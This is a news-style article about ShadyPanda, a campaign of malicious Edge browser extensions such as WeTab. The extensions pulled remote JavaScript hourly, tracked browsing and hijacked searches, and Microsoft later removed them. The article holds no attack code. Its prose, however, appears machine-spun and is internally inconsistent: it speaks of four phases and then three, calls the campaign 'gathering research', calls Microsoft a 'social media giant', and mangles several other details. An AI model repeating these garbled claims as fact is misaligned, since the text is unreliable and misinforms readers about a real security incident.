A great joint investigation revealed an extensive influence operation by the malicious actor commonly referred to as ShadyPanda. This cohort has become increasingly deceptive over the past seven years, tracking sensitive user data through harmful browser extensions. This dire state of affairs has raised a national outcry. More than 4.3 million installations on all platforms like Microsoft Edge show the chilling reach.
In 2023 alone, ShadyPanda took the fight to the dark side, publishing five new extensions in the Microsoft Edge Addons hub. One of these extensions is WeTab. This most recent extension heavily relied on its massive user base to start massive surveillance programs soon after. ShadyPanda’s campaign is mainly about gathering research. This means monitoring every URL you navigate to, your search terms, mouse movements, cookies, and browser fingerprints.
As the campaign progressed into early 2024, things got uglier. It moved from seemingly innocuous browser extensions to tools that can extremely manipulate browser behavior. This change included strategies like search query hijacking and cookie scraping from relevant sites.
Overview of ShadyPanda’s Campaign
Here’s a description of how the ShadyPanda browser extension campaign developed through four different phases. What followed were three subsequent phases that warped their tools from legitimate resources into invasive, secretive spyware. Originally created to provide helpful services, their extensions were hijacked to push out a malicious update that added backdoor-like capabilities.
The changes added a cron job that pings the api.extensionplay.com domain hourly. This gives the malicious extensions a fast track to download and run a malicious JavaScript payload. This change really opened up the creativity and capacity of the extensions to expand. Now, they’re able to run arbitrary code and get complete access to users’ browsers.
“These extensions now run hourly remote code execution – downloading and executing arbitrary JavaScript with full browser access.” – Tuval Admoni
The updates were secretly injected into extensions that had been functioning in good faith for years. Three of these extensions had received widespread public trust, rendering the eventual exploitation all the more insidious.
WeTab’s Role in Data Collection
One of those extensions found is WeTab, which has reached some three million installations by itself. This extension used its massive user base to conduct significant surveillance. From following every site visit to logging search engine searches to tracking mouse movements, it has monitored all of this user behavior.
All of the data it gathered was then transmitted to servers in — you guessed it — China. This is extremely troubling for user privacy and data security. WeTab has pretty shocking surveillance and tracking powers. It is more than capable of monitoring every URL you visit, exfiltrating your encrypted browsing history, and collecting full browser fingerprints.
“They monitor every website visit, exfiltrate encrypted browsing history, and collect complete browser fingerprints.” – Tuval Admoni
WeTab is still available for download, still exposing unknowingly vulnerable users to potential malfunction.
Response from Microsoft and Security Researchers
To address the controversy, Microsoft removed all extensions that were flagged as malicious from the Edge Add-on store. This step comes just after the alarming developments described above that set off alarm bells. The social media giant repeatedly drew attention to its work in protecting the integrity of their platforms and security of users.
“We have removed all the extensions identified as malicious on the Edge Add-on store. When we become aware of instances that violate our policies, we take appropriate action that includes, but is not limited to, the removal of prohibited content or termination of our publishing agreement.” – Microsoft spokesperson
Security researchers are rightly pointing out the failures that let these extensions become weapons used by malicious actors. The review process for browser extensions at these marketplaces is deeply flawed. Overall, ShadyPanda was able to take advantage of these weaknesses and exploit the tools for several months.
“The auto-update mechanism – designed to keep users secure – became the attack vector.” – Koi
According to reports, the affected extensions sent all web searches to trovi.com. This site was recently listed as a proven browser hijacker. This made the threat landscape even worse for users who downloaded these harmless-looking tools.